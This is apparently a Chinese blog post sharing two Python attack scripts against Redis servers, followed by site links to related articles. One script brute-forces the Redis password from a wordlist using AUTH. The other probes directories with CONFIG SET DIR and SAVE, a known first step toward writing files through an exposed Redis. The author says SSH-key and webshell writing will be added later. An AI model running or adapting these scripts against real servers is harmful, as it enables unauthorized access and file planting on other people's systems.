### Redis weakpassword

# 获取password

def passwd_dict(dict):

    with open(str(password_dict), 'r', encoding='utf-8') as f:

        passwd_list = f.readlines()

        passwd = []

        for i in passwd_list:

            passwd.append(i.rstrip('\n'))

    f.close()

    # print(passwd)

    return passwd

# 爆破密码

def intruder(ip, port, passwd):

    try:

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.settimeout(5.0)

        s.connect((ip, int(port)))

        print("[*] 正在对{0}:{1}的密码进行爆破 [*]".format(ip, port))

        for p in passwd:

            send_data = 'AUTH {0}\r\n'.format(p)

            s.send(send_data.encode())

            print("[*] 正在尝试密码 {0} [*]".format(p))

            response = bytes.decode(s.recv(1024))

            if '+OK' in response:

                result = "[!] {0}:{1} 存在弱口令 {2} [!]".format(ip, port, p)

                print(result)

                sys.exit()

    except Exception as e:

        print("[-] {0}:{1} {2} [-]".format(ip, port, e))

### Redis IntruFolder

# 获取目录名称

def getargv(folderdict):

    with open(str(folderdict), 'r', encoding='utf-8') as f:

        folderlsit = f.readlines()

        folder = []

        for i in folderlsit:

            folder.append(i.rstrip('\n'))

    f.close()

    # print(passwd)

    return folder

# 爆破目录

def intruder(ip, port, folderlist):

    try:

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.settimeout(3.0)

        s.connect((ip, int(port)))

        print("[*] 正在对{}的目录进行爆破 [*]".format(ip))

        for p in folderlist:

            password = int('123456')

            send_data = 'CONFIG SET DIR {}\r\n SAVE\r\n'.format(p)

            s.send(send_data.encode())

            # print("[*] 正在尝试目录 {0} [*]".format(p))

            response = bytes.decode(s.recv(1024))

            if not '-ERR Changing directory: No such file or directory' in response:

                result = "[+]{0} [+]".format(p)

                print(result)

                # sys.exit()

            else:

                print('[-]{} [-]'.format(p))

    except Exception as e:

        print("[-] {0}:{1} {2} [-]".format(ip, port, e))

ps:简单记录下,后续会延展下windows的目录爆破或针对性的爆破web目录,以及添加写ssh key和webshell,欢迎各位师傅们评论指正缺点~

python3 Redis利用脚本的更多相关文章

  1. python3 Redis未授权检测脚本

    `import sys import getopt import socket def get_target(): opts, args = getopt.getopt(sys.argv[1:], ' ...

  2. Redis Lua脚本完全入门

    1. 前言 Redis是高性能的KV内存数据库,除了做缓存中间件的基本作用外还有很多用途,比如胖哥以前分享的Redis GEO地理位置信息计算.Redis提供了丰富的命令来供我们使用以实现一些计算.R ...

  3. 利用脚本修改SQL SERVER排序规则

    利用脚本修改SQL SERVER排序规则 编写人:CC阿爸 2014-3-1 l  今年的一项重要工作是对公司所用系统进行繁简的转换,程序转成简体基本很容易解决,但数据库转换成简体,就没那么容易了.经 ...

  4. Python3之利用Cookie模拟登录

    Python3之利用Cookie模拟登录 利用Cookie模拟登录步骤: 1.       在浏览器输入http://demo.bxcker.com,输入用户名和密码登录. 2.登录成功点" ...

  5. Redis Lua脚本调试

    从版本3.2开始,Redis包含一个完整的Lua调试器,可以用来使编写复杂Redis脚本的任务更加简单. 由于Redis 3.2仍处于测试阶段,请unstable从Github 下载Redis 的分支 ...

  6. 部署Redis(脚本安装)

    部署Redis(脚本安装) #/bin/bash # DES:Redis Deploy # Author: will_xue # Email:linuxcto@aliyun.com # DATE : ...

  7. SQL中利用脚本创建database mail.

    SQL中利用脚本创建database mail   编写人:CC阿爸 2014-6-14 多话不讲,请参考以下脚本 use  

  8. SQL中利用脚本恢复数据库

    SQL中利用脚本恢复数据库   编写人:CC阿爸 2014-6-15 在日常SQL数据库的操作中,如何恢复数据库 use master drop database SCS1 RESTORE DATAB ...

  9. python3:利用smtplib库和smtp.qq.com邮件服务器发送邮件

    python3:利用smtplib库和smtp.qq.com邮件服务器发送邮件 使用qq的邮件服务器需要注意的两个地方主要是: 1.协议问题 使用465端口 SSL 协议 2.口令问题 出现SMTPA ...

随机推荐

  1. php解决约瑟夫环

    今天偶遇一道算法题 "约瑟夫环"是一个数学的应用问题:一群猴子排成一圈,按1,2,-,n依次编号.然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数, 再数到第m只,在把 ...

  2. buu 新年快乐

    一.查壳 发现是upx的壳. 二.拖入ida,发现要先脱壳. 题外话.总结一下手动脱壳,esp定律: 1.先单步到只有esp红色时,右键数据窗口跟随. 2.到数据窗口后,左键硬件访问,byte和wor ...

  3. linux中如何添加用户并赋予root权限详解

    #adduser username 修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示: ## Allow root to run any commands anyw ...

  4. windows下flutter2.2.3环境搭建

    先上几个必上的网站: 官网: https://flutter.cn/docs/get-started/install/windows 中文资源网(毕竟中文母语,看着轻松): https://flutt ...

  5. 你觉得我的这段Java代码还有优化的空间吗?

    上周,因为要测试一个方法的在并发场景下的结果是不是符合预期,我写了一段单元测试的代码.写完之后截了个图发了一个朋友圈,很多人表示短短的几行代码,涉及到好几个知识点. 还有人给出了一些优化的建议.那么, ...

  6. 前端-Vue基础1

    Vue核心思想:只要改变数据,页面就会发生改变 1.引入vue 1.下载vue.js 2.在script标签的src属性中,引入vue.js <script src="js/vue.j ...

  7. MapReduce学习总结之架构

    一.MapReduce1.x架构 1)jobTracker:JT 作业的管理者 将作业分解成一堆任务:Task(MapTask和ReduceTask) 将任务分派给TaskTracker(TT)运行 ...

  8. 微信小程序云开发-数据库表创建和操作

    一.新建云数据库 进入[云开发]界面,点击[数据库]>添加>创建集合>确定. 二.向数据库中添加数据 选中[数据库],点击[添加记录],向数据库中添加记录 添加[字段]和[值],并选 ...

  9. Linux服务系统申请SSL证书方法

    inux主要面向专业性较强的技术人员,如果是WEB站点通常采取PHP语言为主选,可选的服务器环境中有Apache.Nginx.Tomcat这几类为主的框架环境,有的图方便会用一些可视化一键式的控制面板 ...

  10. IPV6改造?华为云如此简单

    现在很多企业都在搞这个IPV6改造,说实话这个IPV6改造我这边也不是特别精通,也是通过查阅各种资料来了解IPV6这个东西,下面是我查的一些资料大家可以借鉴一下. IPv6改造三步曲--Vecloud ...